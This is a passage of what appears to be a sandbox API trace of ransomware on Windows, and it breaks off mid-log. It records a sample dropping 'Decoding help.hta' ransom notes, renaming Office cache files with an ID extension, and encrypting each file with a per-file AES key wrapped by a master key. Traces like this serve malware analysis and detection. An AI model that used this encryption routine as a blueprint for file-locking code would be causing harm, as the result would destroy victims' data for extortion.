cFileName="wab32res.dll", cAlternateFileName="")) returned 1 [0041.457] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0041.457] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned 44 [0041.457] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Decoding help.hta" [0041.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\decoding help.hta")) returned 0x1 [0041.457] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wab32res.dll") returned -1 [0041.457] lstrlenW (lpString="wab32res.dll") returned 12 [0041.457] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0041.457] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned 44 [0041.457] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\", lpString2="wab32res.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll" [0041.457] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll" [0041.457] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0041.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files\\common files\\system\\wab32res.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\wab32res.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.457] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f46d56, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc0f46d56, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x1f9ed5b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll", cAlternateFileName="")) returned 0 [0041.457] FindClose (in: hFindFile=0x5a5c70 | out: hFindFile=0x5a5c70) returned 1 Thread: id = 119 os_tid = 0x494 [0040.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0xb18fd30 | out: lpFindFileData=0xb18fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5770 [0041.555] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.555] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xb18fd30 | out: lpFindFileData=0xb18fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.555] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.555] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.555] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xb18fd30 | out: lpFindFileData=0xb18fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0041.555] lstrcpyW (in: lpString1=0x983a6a8, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" [0041.555] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.555] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.555] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.555] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0042.009] WriteFile (in: hFile=0x4c8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xb18fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xb18fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.010] CloseHandle (hObject=0x4c8) returned 1 [0042.010] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.011] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Setup.xml") returned -1 [0042.011] lstrlenW (lpString="Setup.xml") returned 9 [0042.011] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" [0042.011] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0042.011] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" [0042.011] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" [0042.011] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0042.011] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.012] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0042.012] CreateFileMappingA (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4cc [0042.012] CryptAcquireContextA (in: phProv=0xb18fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb18fcec*=0x344a1b0) returned 1 [0045.243] CryptGenKey (in: hProv=0x344a1b0, Algid=0x6610, dwFlags=0x1, phKey=0xb18fce8 | out: phKey=0xb18fce8*=0x5d7d50) returned 1 [0045.243] CryptExportKey (in: hKey=0x5d7d50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb18fbe4, pdwDataLen=0xb18fce4 | out: pbData=0xb18fbe4*, pdwDataLen=0xb18fce4*=0x2c) returned 1 [0045.243] MapViewOfFile (hFileMappingObject=0x4cc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x960) returned 0x3a10000 [0045.269] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb18fbe4*, pdwDataLen=0xb18fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb18fbe4*, pdwDataLen=0xb18fcf8*=0x100) returned 1 [0045.270] CryptEncrypt (in: hKey=0x5d7d50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a10000*, pdwDataLen=0xb18fce4*=0x960, dwBufLen=0x960 | out: pbData=0x3a10000*, pdwDataLen=0xb18fce4*=0x960) returned 1 [0045.270] UnmapViewOfFile (lpBaseAddress=0x3a10000) returned 1 [0045.271] CloseHandle (hObject=0x4cc) returned 1 [0045.272] CryptDestroyKey (hKey=0x5d7d50) returned 1 [0045.272] CryptReleaseContext (hProv=0x344a1b0, dwFlags=0x0) returned 1 [0045.272] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.272] WriteFile (in: hFile=0x4c8, lpBuffer=0xb18fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb18fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb18fbe4*, lpNumberOfBytesWritten=0xb18fcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.437] WriteFile (in: hFile=0x4c8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb18fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb18fcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.438] CloseHandle (hObject=0x4c8) returned 1 [0045.438] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0045.438] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xb18fd30 | out: lpFindFileData=0xb18fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0048.523] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" [0048.523] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0048.523] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0048.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0048.523] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WordLR.cab") returned -1 [0048.523] lstrlenW (lpString="WordLR.cab") returned 10 [0048.523] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" [0048.523] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0048.523] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="WordLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" [0048.523] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" [0048.523] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0048.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0048.524] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0048.524] CreateFileMappingA (hFile=0x714, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x470 [0048.524] CryptAcquireContextA (in: phProv=0xb18fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb18fcec*=0x3448500) returned 1 [0048.525] CryptGenKey (in: hProv=0x3448500, Algid=0x6610, dwFlags=0x1, phKey=0xb18fce8 | out: phKey=0xb18fce8*=0x5e2c30) returned 1 [0048.525] CryptExportKey (in: hKey=0x5e2c30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb18fbe4, pdwDataLen=0xb18fce4 | out: pbData=0xb18fbe4*, pdwDataLen=0xb18fce4*=0x2c) returned 1 [0048.525] MapViewOfFile (hFileMappingObject=0x470, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x182e0000 [0048.540] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb18fbe4*, pdwDataLen=0xb18fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb18fbe4*, pdwDataLen=0xb18fcf8*=0x100) returned 1 [0048.540] CryptEncrypt (in: hKey=0x5e2c30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x182e0000, pdwDataLen=0xb18fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x182e0000*, pdwDataLen=0xb18fce4*=0x100000) returned 1 [0049.532] UnmapViewOfFile (lpBaseAddress=0x182e0000) returned 1 [0049.613] CloseHandle (hObject=0x470) returned 1 [0049.613] CryptDestroyKey (hKey=0x5e2c30) returned 1 [0049.613] CryptReleaseContext (hProv=0x3448500, dwFlags=0x0) returned 1 [0049.613] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.613] WriteFile (in: hFile=0x714, lpBuffer=0xb18fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb18fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb18fbe4*, lpNumberOfBytesWritten=0xb18fcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.142] WriteFile (in: hFile=0x714, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb18fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb18fcf8*=0x500, lpOverlapped=0x0) returned 1 [0053.639] CloseHandle (hObject=0x714) returned 1 [0053.639] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.639] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xb18fd30 | out: lpFindFileData=0xb18fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0053.641] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" [0053.642] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0053.642] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0053.642] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0053.642] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WordMUI.msi") returned -1 [0053.642] lstrlenW (lpString="WordMUI.msi") returned 11 [0053.642] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" [0053.642] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0053.642] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="WordMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" [0053.642] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" [0053.642] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0053.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0053.643] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0053.643] CreateFileMappingA (hFile=0x714, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x730 [0053.643] CryptAcquireContextA (in: phProv=0xb18fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb18fcec*=0x34490b0) returned 1 [0055.066] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0xb18fce8 | out: phKey=0xb18fce8*=0x6710b0) returned 1 [0055.067] CryptExportKey (in: hKey=0x6710b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb18fbe4, pdwDataLen=0xb18fce4 | out: pbData=0xb18fbe4*, pdwDataLen=0xb18fce4*=0x2c) returned 1 [0055.067] MapViewOfFile (hFileMappingObject=0x730, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x7010000 [0055.077] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb18fbe4*, pdwDataLen=0xb18fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb18fbe4*, pdwDataLen=0xb18fcf8*=0x100) returned 1 [0055.077] CryptEncrypt (in: hKey=0x6710b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x7010000, pdwDataLen=0xb18fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x7010000*, pdwDataLen=0xb18fce4*=0x100000) returned 1 [0055.866] UnmapViewOfFile (lpBaseAddress=0x7010000) returned 1 [0055.879] CloseHandle (hObject=0x730) returned 1 [0055.879] CryptDestroyKey (hKey=0x6710b0) returned 1 [0055.879] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0055.879] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.879] WriteFile (in: hFile=0x714, lpBuffer=0xb18fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb18fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb18fbe4*, lpNumberOfBytesWritten=0xb18fcf8*=0x100, lpOverlapped=0x0) returned 1 